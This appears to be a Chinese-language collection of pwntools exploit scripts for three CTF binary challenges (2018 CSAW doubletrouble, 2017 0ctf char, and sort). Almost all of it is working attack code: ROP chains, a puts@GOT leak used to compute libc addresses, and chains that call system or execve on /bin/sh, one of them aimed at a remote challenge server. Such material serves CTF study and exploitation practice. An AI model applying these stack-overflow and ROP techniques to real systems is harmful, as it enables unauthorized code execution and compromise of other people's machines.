令人绝望的 Pwn PoC 总结
2018 CSAW - doubletrouble
题目链接:doubletrouble.zip
from pwn import *
local = 1
elf = ELF('./doubletrouble')
# Choose the target once: a local process when `local` is set, otherwise the
# remote challenge service named in the write-up.
io = process('./doubletrouble') if local else remote('pwn.chal.csaw.io', 9002)
def d2b(f):
    """Pack the float *f* into its 8-byte little-endian IEEE-754 double encoding."""
    packer = struct.Struct('<d')
    return packer.pack(f)
def b2d(f):
    """Decode the 8-byte little-endian IEEE-754 double *f* into a Python float.

    Raises struct.error when *f* is not exactly 8 bytes long.
    """
    (value,) = struct.Struct('<d').unpack(f)
    return value
def sendNum(num):
    """Echo *num* locally and send it, formatted with '%.20e', after the 'Give me: ' prompt.

    The 20-digit exponent form is used so the double survives the text
    round-trip without losing precision.
    """
    text = '%.20e' % num
    print('sendNum: ' + text)
    io.sendlineafter('Give me: ', text)
def sendNumPair(num1,num2):
    """Send two 32-bit words as a single double.

    *num1* is packed into the first four bytes and *num2* into the last four,
    then the 8 bytes are reinterpreted as a double and passed to sendNum().
    """
    raw = p32(num1) + p32(num2)
    sendNum(b2d(raw))
def pwn1(): # leak got addr
    """First stage: answer the 'How long: ' prompt with 64 and send 64 doubles.

    Each sendNumPair() call encodes two dwords into one double, so the pairs
    below land as consecutive 32-bit words. Counting: 7 filler values, 7 chain
    entries, then 50 more filler values, 64 in total. The gadget/GOT/symbol
    addresses are hard-coded for this challenge binary (the fixed 0x0804xxxx
    values suggest a non-PIE build — not verified here).
    """
    io.sendlineafter('How long: ','64')
    # Filler values; the write-up labels -99 as the canary slot and -98 as padding.
    for i in range(7): sendNum(-100)
    sendNum(-99) # junk_canary
    sendNum(-98) # junk
    sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
    sendNum(-98) # junk
    sendNumPair(elf.plt['puts'], 0x080498A2) # plt.puts ; ret: [pop edi ; pop ebp ; ret]
    sendNumPair(elf.got['puts'], 0x080498A8) # got.puts ; junk
    sendNumPair(elf.symbols['_start'], 0x080498AC) # program run again ; junk
    for i in range(64-7-7): sendNum(-98)
def pwn2(): # call system & get shell
    """Second stage: consume the puts@GOT leak, derive libc addresses, send the final chain.

    Assumes the process has re-entered via the `_start` entry queued by pwn1
    and is printing the array again, so the leaked 4 bytes follow the '70:'
    line. The libc offsets are hard-coded for two specific libc builds (local
    vs. remote) and must match the one actually loaded; a mismatch yields wrong
    addresses rather than an error.
    """
    io.recvuntil('70:')
    io.recvline() # junk
    data=io.recv(4) # get got addr
    # If the canary slot was clobbered the program aborts with a message
    # containing '***' (presumably glibc's stack-protector text) instead of
    # printing the pointer, so give up rather than parse garbage.
    if '***' in data:
        print 'stack smashing detected, try again!'
        exit()
    libc_puts_addr=u32(data)
    if local:
        libc_base_addr=libc_puts_addr-0x67e30
        libc_system_addr=libc_base_addr+0x3d7e0
        libc_sh_addr=libc_base_addr+0x17c968
    else:
        libc_base_addr=libc_puts_addr-0x67b40
        libc_system_addr=libc_base_addr+0x3d200
        libc_sh_addr=libc_base_addr+0x17e0cf
    print 'libc_puts_addr: %s' % hex(libc_puts_addr)
    print 'libc_base_addr: %s' % hex(libc_base_addr)
    print 'libc_system_addr: %s' % hex(libc_system_addr)
    print 'libc_sh_addr: %s' % hex(libc_sh_addr)
    if not local:
        # Remote variant: read one extra hex line and treat it as a stack
        # address; it is only consumed by the `else` branch below.
        io.recvline() # junk
        stack_addr=int(io.recvline().strip(),16)
        print 'stack_addr: %s' % hex(stack_addr)
    io.sendlineafter('How long: ','64')
    if local:
        # 64 entries: 6 filler + 6 chain + 52 filler.
        for i in range(6): sendNum(-100)
        sendNum(-99) # junk_canary
        sendNum(-98) # junk
        sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
        sendNum(-98) # junk
        sendNumPair(libc_system_addr, 0x080498A2) # got.system ; fake_ret
        sendNumPair(libc_sh_addr, 0x080498A8) # got.str_sh ; junk
        for i in range(64-6-6): sendNum(-98)
    else:
        # 64 entries: 8 filler + 8 chain + 48 filler. The command string is
        # placed in the array itself and referenced through stack_addr+0x230
        # (offset presumably measured for the remote environment — TODO confirm).
        for i in range(8): sendNum(-100)
        sendNum(-99) # junk_canary
        sendNum(-98) # junk
        sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
        sendNum(-98) # junk
        sendNumPair(libc_system_addr, 0x080498A2) # got.system ; fake_ret
        sendNumPair(stack_addr+0x230, 0x080498A8) # stack.str_command ; junk
        #sendNumPair(0x2F20736C, 0x6E69622F) # ls //bin
        #sendNumPair(0x00000000, 0x6E696230) # \x00 ; junk
        sendNumPair(0x6E69622F, 0x6162722F) # /bin/rba
        sendNumPair(0x00006873, 0x61627230) # sh\x00 ; junk
        for i in range(64-8-8): sendNum(-98)
# Run the two stages back to back, then hand the session over to the user.
for stage in (pwn1, pwn2):
    stage()
io.interactive()
2017 0ctf - char
题目链接:char.zip
from pwn import *
io = process('./char')
# Fixed libc base; the write-up relies on it being stable between runs
# (presumably ASLR is off for this challenge — not verified here).
libc_base = 0x5555e000

# Gadget addresses, each relative to libc_base unless noted; the comments
# reproduce the disassembly given in the write-up.
chain = [
    libc_base + 0x000a8456,  # xchg ebx, ecx ; test edx, edx ; je 0xa8467 ; mov dword ptr [edx], eax ; ret
    libc_base + 0x00094b49,  # pop ebx ; pop esi ; ret 0x556bb7ec
    0x2a355b76,              # ebx   (str_sh_addr = ebx + esi)
    0x2b365c76,              # esi
    libc_base + 0x00187554,  # add ebx, esi ; add dword ptr [edx], ecx ; ret
    libc_base + 0x000b9940,  # mov edx, 0xffffffff ; cmovne eax, edx ; ret
    libc_base + 0x000e4d7a,  # inc edx ; xor eax, eax ; ret
]
chain += [libc_base + 0x000e6263] * 11  # inc eax ; ret
chain.append(libc_base + 0x00109177)    # int 0x80

# 0x1c bytes of buffer filler plus 4 bytes over the saved ebp, then the chain.
payload = 'a' * 0x1c + 'a' * 0x4
payload += ''.join(p32(addr) for addr in chain)
print(payload)
io.sendafter('GO : ) \n', payload)
io.interactive()
sort
题目链接:sort.zip
from pwn import *
# Debug logging first so the process start-up is captured too.
context.update(log_level='debug')
io = process('./sort')
def send_num(num):
    """Send the decimal text of *num* as one line to the sort program."""
    line = str(num)
    io.sendline(line)
io.sendlineafter('be sorted: \n','32')
io.recvuntil('no. : \n')
# 32 values in total (4 + 5 + 22 + 1), each sent as decimal text by send_num().
# All addresses are hard-coded for this challenge binary.
for i in range(0x4):
    send_num(0xfffffffe) # junk code
send_num(0xffffffff) # fake ebp
send_num(0x0804887c) # eip: getinp
send_num(0x080eba24) # fake ret addr
send_num(0x080eba28) # getinp param1: read addr
send_num(0x080eba2C) # getinp param2: read len
for i in range(0x20-10):
    send_num(0x080eba30) # junk code
send_num(0x080eba34) # eip
# Second input, consumed by the getinp call queued above: a NUL dword, the
# little-endian bytes of "/bin" and "/sh\x00", two filler dwords, then the chain.
payload=p32(0x00000000) # \x00\x00\x00\x00
payload+=p32(0x6e69622f) # nib/
payload+=p32(0x0068732f) # \x00hs/
payload+=p32(0xfffffffe)*2 # junk code
payload+=p32(0x08052b14) # pop eax ; ret
payload+=p32(0x080eba28) # getinp param1: read addr ; bypass 0x080488B3
payload+=p32(0x08052b14) # pop eax ; ret
payload+=p32(0x0000000b) # eax: 0x0b
payload+=p32(0x080481c9) # pop ebx ; ret
payload+=p32(0x080eba2c) # ebx addr: /bin/sh\x00
payload+=p32(0x080dedf5) # pop ecx ; ret
payload+=p32(0x080eba28) # ecx addr: \x00\x00\x00\x00
payload+=p32(0x0806fdda) # pop edx ; ret
payload+=p32(0x080eba28) # edx addr: \x00\x00\x00\x00
payload+=p32(0x0806da43) # int 0x80
io.send(payload)
io.interactive()